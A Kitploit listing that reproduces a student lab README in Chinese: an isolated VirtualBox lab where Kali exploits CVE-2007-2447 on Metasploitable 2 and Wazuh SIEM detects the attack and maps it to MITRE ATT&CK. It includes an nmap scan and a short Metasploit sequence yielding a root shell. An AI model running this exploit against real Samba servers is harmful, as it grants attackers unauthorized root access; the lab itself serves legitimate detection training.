Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2007-2447-Exploitation-SIEM-Detection-Lab — 隔离的 AD/Linux 攻击实验室:通过 Metasploit 利用 CVE-2007-2447,使用 Wazuh SIEM 检测并映射至 MITRE ATT&CK(T1190、T1059) | Kitploit
工具/GitHubGitHub/harshiys/cve-2007-2447-exploitation-siem-detection-lab
侦察漏洞利用框架漏洞分析漏洞利用渗透测试威胁情报入侵检测学习与教育日志分析

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
实验室与实践
GitHubharshiys/cve-2007-2447-exploitation-siem-detection-lab

CVE-2007-2447-Exploitation-SIEM-Detection-Lab

隔离的 AD/Linux 攻击实验室:通过 Metasploit 利用 CVE-2007-2447,使用 Wazuh SIEM 检测并映射至 MITRE ATT&CK(T1190、T1059)

查看仓库
1026天前尚未审核

🛡️ CVE-2007-2447 漏洞利用与 SIEM 检测实验室(Wazuh + MITRE ATT&CK)

B.Tech 项目(BTP)| IIIT Pune 基于:《为检测与监控设计和实现有效的网络安全家庭实验室》 — ICCCNT 2023,IIT Delhi

一个基于单台机器、使用免费开源工具构建的功能完整的网络安全家庭实验室。该实验室模拟真实世界的攻击生命周期——侦察 → 利用 → 检测——并演示 SIEM 如何实时检测攻击并将其映射到 MITRE ATT&CK 框架。


📐 实验室架构

root@kitploit:~
┌─────────────────────────────────────────────────┐
│           VirtualBox — Internal Network          │
│              (cyberlab, 10.0.0.x/24)             │
│                                                  │
│  ┌──────────┐   ┌──────────────┐   ┌──────────┐ │
│  │  Kali    │   │ Metasploitable│  │  Ubuntu  │ │
│  │ 10.0.0.1 │◄─►│   10.0.0.2   │◄─►│ 10.0.0.3 │ │
│  │ ATTACKER │   │    VICTIM     │  │   SIEM   │ │
│  └──────────┘   └──────────────┘   └──────────┘ │
└─────────────────────────────────────────────────┘
         Host-Only Adapter (192.168.56.103)
         → Wazuh Dashboard access from browser
虚拟机角色IP工具
Kali Linux 2026.1攻击者10.0.0.1Nmap、Metasploit
Metasploitable 2受害者10.0.0.220+ 个漏洞
Ubuntu 22.04 + WazuhSIEM10.0.0.3Wazuh v4.7.5

🧰 工具与技术


🔧 搭建指南

前提条件

  • 一台至少 16 GB 内存 的机器(3 台虚拟机同时运行)
  • 已安装 VirtualBox 7.x
  • 约 50 GB 可用磁盘空间

第 1 步 — 在 VirtualBox 中进行网络设置

在 VirtualBox 中创建一个名为 cyberlab 的内部网络。三台虚拟机均使用该适配器。Ubuntu/Wazuh 虚拟机额外配置一个仅主机适配器,以便从浏览器访问仪表板。


第 2 步 — Kali Linux(攻击者)

  1. 下载 Kali Linux VirtualBox 镜像
  2. 导入并分配 cyberlab 内部网络适配器
  3. 设置静态 IP:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.1
    netmask 255.255.255.0
  1. 重启网络服务:sudo systemctl restart networking

第 3 步 — Metasploitable 2(受害者)

  1. 下载 Metasploitable 2
  2. 导入 VirtualBox,分配 cyberlab 网络
  3. 设置静态 IP:
root@kitploit:~
# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
    address 10.0.0.2
    netmask 255.255.255.0

⚠️ 切勿将 Metasploitable 2 暴露到互联网。 它本身就存在严重的安全漏洞。


第 4 步 — Ubuntu + Wazuh SIEM(防御方)

  1. 安装 Ubuntu Server 22.04
  2. 分配两个适配器:cyberlab 内部网络 + 仅主机适配器
  3. 通过 netplan 配置静态 IP(/etc/netplan/01-network-manager-all.yaml):
root@kitploit:~
network:
  version: 2
  renderer: NetworkManager
  ethernets:
    enp0s3:
      addresses:
        - 10.0.0.3/24
    enp0s8:
      dhcp4: true
  1. 安装 Wazuh(单节点):
root@kitploit:~
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
  1. 访问仪表板:https://192.168.56.103(从宿主机浏览器)

第 5 步 — 通过 Syslog 将 Metasploitable 连接到 Wazuh

由于 Metasploitable 2 无法运行 Wazuh 代理,请配置 syslog 转发 以实现无代理监控:

在 Metasploitable 上,将以下内容添加到 /etc/rsyslog.conf:

root@kitploit:~
*.* @10.0.0.3:514

在 Wazuh(Ubuntu)上,在 /var/ossec/etc/ossec.conf 中启用 syslog 输入:

root@kitploit:~
<remote>
  <connection>syslog</connection>
  <port>514</port>
  <protocol>udp</protocol>
</remote>

重启 Wazuh:sudo systemctl restart wazuh-manager


⚔️ 攻击模拟

阶段 1 — 侦察(Nmap)

root@kitploit:~
# From Kali
nmap -sV -O 10.0.0.2

在 Metasploitable 2 上发现的关键服务:

发现 20+ 个开放端口。操作系统指纹识别:Linux 2.6.x


阶段 2 — 漏洞利用(Metasploit)

漏洞: CVE-2007-2447 — Samba usermap_script 命令注入

允许未认证攻击者通过向 Samba 3.0.0–3.0.25rc3 发送畸形 MS-RPC 请求来执行远程代码。

root@kitploit:~
# From Kali — launch Metasploit
msfconsole

# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run

# Verify root access
whoami
# Output: root

阶段 3 — 检测(Wazuh SIEM)

利用成功后,Wazuh 自动检测事件并将其映射到 MITRE ATT&CK:

检测到的事件总数:55+

访问仪表板 https://192.168.56.103 → 安全事件 → MITRE ATT&CK


📊 关键成果

  • ✅ 在隔离环境中成功复现了完整的攻击生命周期
  • ✅ CVE-2007-2447 在数秒内获得未认证的 root shell
  • ✅ Wazuh SIEM 实时检测到所有攻击并将其映射到 MITRE ATT&CK
  • ✅ Syslog 转发实现了对旧版 Metasploitable 系统的无代理监控
  • ✅ 整个实验室在单台 16 GB 内存的主机上运行

📁 仓库结构

root@kitploit:~
cybersecurity-home-lab/
│
├── README.md                  ← You are here
├── network-config/
│   ├── kali-interfaces.txt    ← Kali static IP config
│   ├── metasploitable-interfaces.txt
│   └── ubuntu-netplan.yaml    ← Ubuntu/SIEM netplan config
├── wazuh-config/
│   └── ossec.conf             ← Wazuh syslog/agent config
├── screenshots/
│   ├── nmap-scan.png
│   ├── metasploit-exploit.png
│   ├── wazuh-dashboard.png
│   └── wazuh-alerts-table.png
└── report/
    └── ICCCNT_2023_paper.pdf  ← Reference research paper

🔗 参考文献

Dadiyala, C. 等人(2023)。《为检测与监控设计和实现有效的网络安全家庭实验室》。 第 14 届国际计算、通信与网络技术会议(ICCCNT),IIT Delhi。IEEE-56998。


⚠️ 免责声明

本实验室完全构建于隔离的虚拟机上,攻击模拟期间不连接互联网。所有工具和技术仅用于受控环境中的教育目的。请勿在您不拥有或未经明确授权测试的系统上尝试复现任何攻击技术。


由 Harshita Verma 呈现 | IIIT Pune

下载工具
工具版本用途
VirtualBox7.x虚拟机监控程序——在一台主机上运行所有虚拟机
Kali Linux2026.1渗透测试操作系统(攻击性)
Metasploitable 2v2.0故意留有漏洞的攻击目标
Wazuhv4.7.5开源 SIEM(防御性)
Nmap最新版网络/端口扫描
Metasploit Framework最新版漏洞利用框架
端口服务版本
21/tcpFTPvsftpd 2.3.4
22/tcpSSHOpenSSH 4.7p1
80/tcpHTTPApache 2.2.8
139/445SMBSamba 3.x–4.x
3306/tcpMySQL5.0.51a
5432/tcpPostgreSQL8.3
规则 ID描述MITRE 技术战术
5402成功执行 sudo 切换至 ROOTT1548.003权限提升
5501PAM:登录会话已打开T1078初始访问 / 持久化
5502PAM:登录会话已关闭T1078防御规避
502Wazuh 服务器已启动—检测活跃